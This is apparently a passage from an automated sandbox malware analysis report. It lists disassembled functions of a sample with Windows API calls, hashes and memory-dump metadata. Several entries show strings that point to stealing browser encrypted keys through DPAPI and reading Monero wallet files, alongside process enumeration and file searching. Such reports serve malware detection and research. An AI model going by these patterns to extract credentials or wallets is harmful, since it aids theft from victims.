                                    • Part of subcall function 00E6A2B0: LocalAlloc.KERNEL32(00000040,00000000), ref: 00E6A2F3
                                    • Part of subcall function 00E6A2B0: LocalFree.KERNEL32(?), ref: 00E6A323
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                                  • String ID: $"encrypted_key":"$DPAPI
                                  • API String ID: 2100535398-738592651
                                  • Opcode ID: 20a72e0ac7036d1aa424466c9901fdb3ba9bea4de300462f6d527b92e21305a0
                                  • Instruction ID: e0e3830db09a23f3a61918c5f52b189a0bcd41bf6c1185b2c6ed643a69f6b24d
                                  • Opcode Fuzzy Hash: 20a72e0ac7036d1aa424466c9901fdb3ba9bea4de300462f6d527b92e21305a0
                                  • Instruction Fuzzy Hash: 1F3132B6D402099BCF14DBD4ED45AEEB7B8AB58344F085568E906B3241F7309E05CBA2
                                  Function 00E78810 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00E7AA50: lstrcpy.KERNEL32(00E80E1A,00000000), ref: 00E7AA98
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00E805BF), ref: 00E7885A
                                  • Process32First.KERNEL32(?,00000128), ref: 00E7886E
                                  • Process32Next.KERNEL32(?,00000128), ref: 00E78883
                                    • Part of subcall function 00E7ACC0: lstrlen.KERNEL32(?,01738AF8,?,\Monero\wallet.keys,00E80E1A), ref: 00E7ACD5
                                    • Part of subcall function 00E7ACC0: lstrcpy.KERNEL32(00000000), ref: 00E7AD14
                                    • Part of subcall function 00E7ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E7AD22
                                    • Part of subcall function 00E7ABB0: lstrcpy.KERNEL32(?,00E80E1A), ref: 00E7AC15
                                  • CloseHandle.KERNEL32(?), ref: 00E788F1
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                  • String ID:
                                  • API String ID: 1066202413-0
                                  • Opcode ID: baa5a0aee39f21ddfa2ba0cd01e5deb19124f552c3d47ab8ee5bf2b77ba1d9be
                                  • Instruction ID: 33802bce4cf80afeb8a4965fa0670bc33f9972ff4992ba77c4b6a0adab56abcf
                                  • Opcode Fuzzy Hash: baa5a0aee39f21ddfa2ba0cd01e5deb19124f552c3d47ab8ee5bf2b77ba1d9be
                                  • Instruction Fuzzy Hash: F0314B71901218ABDB28EF94DD55FEEB7B8EF84700F5491A9F10EB2190DB306A44CFA1
                                  Function 00EDFDF7 Relevance: 6.1, APIs: 4, Instructions: 60COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00EDFE13
                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00EDFE2C
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Value___vcrt_
                                  • String ID:
                                  • API String ID: 1426506684-0
                                  • Opcode ID: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
                                  • Instruction ID: 87a61dea9a7ad21939880b88087d6b6d025af049091cf228f955d7e9ffe26c8e
                                  • Opcode Fuzzy Hash: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
                                  • Instruction Fuzzy Hash: 9A01D8325097A5EDF63456756CC596737D4EB017B9730533BF917A02F2EFA14C829140
                                  Function 00E77B10 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00E80DE8,00000000,?), ref: 00E77B40
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00E77B47
                                  • GetLocalTime.KERNEL32(?,?,?,?,?,00E80DE8,00000000,?), ref: 00E77B54
                                  • wsprintfA.USER32 ref: 00E77B83
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateLocalProcessTimewsprintf
                                  • String ID:
                                  • API String ID: 377395780-0
                                  • Opcode ID: b651f39468158c59384fb72435ecfd2b3864d71d091fe7c4b7cda66c0c2cfd16
                                  • Instruction ID: fc14f6a2c23e3c1cbb4c042b04af5f1c0f803526b5b511d8f0afd11cc4462367
                                  • Opcode Fuzzy Hash: b651f39468158c59384fb72435ecfd2b3864d71d091fe7c4b7cda66c0c2cfd16
                                  • Instruction Fuzzy Hash: DF112AB2904219ABCB14DBC9DD45BBEB7F8EB4CB11F10411AF655A2284D2795940C7B0
                                  Function 00E7CA72 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • __getptd.LIBCMT ref: 00E7CA7E
                                    • Part of subcall function 00E7C2A0: __amsg_exit.LIBCMT ref: 00E7C2B0
                                  • __getptd.LIBCMT ref: 00E7CA95
                                  • __amsg_exit.LIBCMT ref: 00E7CAA3
                                  • __updatetlocinfoEx_nolock.LIBCMT ref: 00E7CAC7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                  • String ID:
                                  • API String ID: 300741435-0
                                  • Opcode ID: 92fddb1665e781f57fe6b5c1e1db68a5ed2a2451c2e8f85fc94b30e9b493eadf
                                  • Instruction ID: de6d4c85b3a42b3bab25a5f26b0a8b69e9d41bc3f6dd5d7126f12701629bcff2
                                  • Opcode Fuzzy Hash: 92fddb1665e781f57fe6b5c1e1db68a5ed2a2451c2e8f85fc94b30e9b493eadf
                                  • Instruction Fuzzy Hash: 9CF090329447199BD620FBB89803B4E33E4AF40726F30F14EF50EB61E3DB6459808B96
                                  Function 00EE04D3 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Catch
                                  • String ID: MOC$RCC
                                  • API String ID: 78271584-2084237596
                                  • Opcode ID: 0af11e6eed5334c4ff19d0facd52f0310ea7249913ed55efd4c21f0934d53438
                                  • Instruction ID: f9eeb58a00e83be7808c3699be7b1cec270a970a05c4f16b421ea27b82ebd18a
                                  • Opcode Fuzzy Hash: 0af11e6eed5334c4ff19d0facd52f0310ea7249913ed55efd4c21f0934d53438
                                  • Instruction Fuzzy Hash: 2741887190024DEFCF25CF99DC81AAEBBB5EF48308F189099F90476215D3759A91CF50
                                  Function 00EE36CB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: T8
                                  • API String ID: 0-1243456643
                                  • Opcode ID: ebee7b7bad02afd5c38f62567c68525325c0f01fa4448d3b7adcdae8bc16ad3d
                                  • Instruction ID: a7dfbed08c0fdb8dc4a873b9969741706f30b10b3370146af2adf793a9f4a441
                                  • Opcode Fuzzy Hash: ebee7b7bad02afd5c38f62567c68525325c0f01fa4448d3b7adcdae8bc16ad3d
                                  • Instruction Fuzzy Hash: FA2192F160029DBFDB10AF73CC8886B77EDAF04368714551AFA15A7550D731EE408790
                                  Function 00E75190 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00E78F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00E78F9B
                                  • lstrcat.KERNEL32(?,00000000), ref: 00E751CA
                                  • lstrcat.KERNEL32(?,00E81058), ref: 00E751E7
                                  • lstrcat.KERNEL32(?,01738A38), ref: 00E751FB
                                  • lstrcat.KERNEL32(?,00E8105C), ref: 00E7520D
                                    • Part of subcall function 00E74B60: wsprintfA.USER32 ref: 00E74B7C
                                    • Part of subcall function 00E74B60: FindFirstFileA.KERNEL32(?,?), ref: 00E74B93
                                    • Part of subcall function 00E74B60: StrCmpCA.SHLWAPI(?,00E80FC4), ref: 00E74BC1
                                    • Part of subcall function 00E74B60: StrCmpCA.SHLWAPI(?,00E80FC8), ref: 00E74BD7
                                    • Part of subcall function 00E74B60: FindNextFileA.KERNEL32(000000FF,?), ref: 00E74DCD
                                    • Part of subcall function 00E74B60: FindClose.KERNEL32(000000FF), ref: 00E74DE2
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                  • String ID:
                                  • API String ID: 2667927680-0
                                  • Opcode ID: 2eb597b23b01e237048ddf7ecd998b026cdea838b1374b12643589d51cc8fcd2
                                  • Instruction ID: d514c16bccaeb29a402225e3871760cc589470bf3d6e960f91899084c3e2599e
                                  • Opcode Fuzzy Hash: 2eb597b23b01e237048ddf7ecd998b026cdea838b1374b12643589d51cc8fcd2
                                  • Instruction Fuzzy Hash: 6C21CDB6540208A7C768F770EC56EED737C9754300F4045A4B55EA61C9DE705BCCCB91